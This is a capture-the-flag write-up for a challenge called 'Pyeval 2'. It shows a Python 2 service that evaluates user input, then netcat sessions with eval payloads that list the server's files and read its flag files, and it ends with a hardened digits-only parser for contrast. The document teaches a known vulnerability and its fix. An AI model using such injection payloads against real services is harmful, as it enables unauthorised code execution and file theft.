Pyeval 2
I learnt about the eval() vulnerability only after seeing this question, and blogged about some basic exploits too, but I was unable to get the flag. One of my seniors helped me out, so here it goes.
#!/usr/bin/env python2
import logging as log
import sys

log.basicConfig(filename="lucky_number.log")
FLAG_FILE = "flag.txt"


def getSecret():
    return open(FLAG_FILE).read()


def prime_factor(n):
    i = 2
    while i * i <= n:
        if n % i:
            i += 1
        else:
            n //= i
    return n


def check_number(number):
    """
    Checks if a number is a good lucky number.
    """
    if not isinstance(number, int) or number < 1:  # condition must be false = not true
        return False
    for i in range(3):
        number = number << i * i
        if number > 0xAAA:
            return False
    cor = prime_factor(number >> 3) ** 3
    if cor == 8 or cor == 4412:
        return False
    number = number & 0xF0F0 >> 8
    return number << 1 == cor


def main():
    sys.stdout.write("Your lucky number:")
    sys.stdout.flush()
    # Python 2 input() evaluates the typed line as an expression,
    # i.e. it behaves like eval(raw_input()).
    number = int(input(""))
    if check_number(number):
        print(getSecret())
    else:
        print("Sorry " + str(number) + " is not a good lucky number.")


if __name__ == '__main__':
    try:
        main()
    except BaseException as ex:
        log.error(str(type(ex)) + str(ex))
        print("Dafuq are you doing?")
The solution goes like this ...
$ nc pwn.bioterra.xyz 4455
Your lucky number: eval('int(open("flag.txt").read().encode("hex"),16)')
Sorry 337525767188140550088399172147333634157597015656050502929863081620339940171846970455466902578741092263765041199540418055192913726139466963575148968021390277031169335897610 is not a good lucky number.
decode -> 'You came here to find a flag. I have bad news: you have to dig deeper.\n'
$ nc pwn.bioterra.xyz 4455
Your lucky number:eval('int(" ".join(__import__("glob").glob("*")).encode("hex"),16)')
Sorry 1453562628065643472662079201217526249117057357179171707844479822976819718786584261355165292489996053572269641484875558843221517604363350353212944732271179892 is not a good lucky number.
decode-> 'lib flag.txt main.py dev lib64 lucky_number.log usr real_flag.txt'
$ nc pwn.bioterra.xyz 4455
Your lucky number:eval('int(open("real_flag.txt").read().encode("hex"),16)')
Sorry 42134526936706142044723527334065041550540595781765024517455445258 is not a good lucky number.
decode -> FLAG
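I too first tried sys.stdout.write(getSecret()), but as you can see, that was not the original flag, just a troll (:
The trick used here: the script passes whatever input() returns to int() and echoes that number back in the "Sorry ..." message, so we first have to encode the output in hex and then convert it to an int.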
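Why the typed line gets executed, and how main() could read it as data instead, as an added example (not part of the original post or the challenge code). It is written for Python 3, so `py2_style_input` emulates Python 2's input(); the helper names and the 6-digit bound are assumptions. In Python 2 itself the same fix is to read the line with raw_input().

```python
import re

def py2_style_input(line):
    """Emulates Python 2 input(): the line is evaluated as an expression."""
    return eval(line)  # vulnerable on purpose, mirrors the challenge's main()

# ASCII digits only ("\d" would also match non-ASCII digits), bounded length.
# Assumption: 6 digits is more than enough, check_number() rejects > 0xAAA.
_DECIMAL = re.compile(r"[0-9]{1,6}")

def parse_lucky_number(line):
    """Hardened reader: the line is data, never code."""
    text = line.strip()
    if not _DECIMAL.fullmatch(text):
        raise ValueError("not a decimal number")
    return int(text)

def read_number(line, parser):
    """Mirrors main(): int(parser(line)), or None where main() would log and bail."""
    try:
        return int(parser(line))
    except Exception:
        return None

# Constructed sample inputs; the last one is the payload shape from the session above.
SAMPLES = [
    "42",
    "2**10",
    'eval(\'int(open("flag.txt").read().encode("hex"),16)\')',
]

if __name__ == "__main__":
    # "2**10" is evaluated to 1024 by the emulated input(), proving the line is code.
    print("eval-style :", [read_number(s, py2_style_input) for s in SAMPLES[:2]])
    # The hardened reader accepts only the plain number and rejects the rest.
    print("hardened   :", [read_number(s, parse_lucky_number) for s in SAMPLES])
```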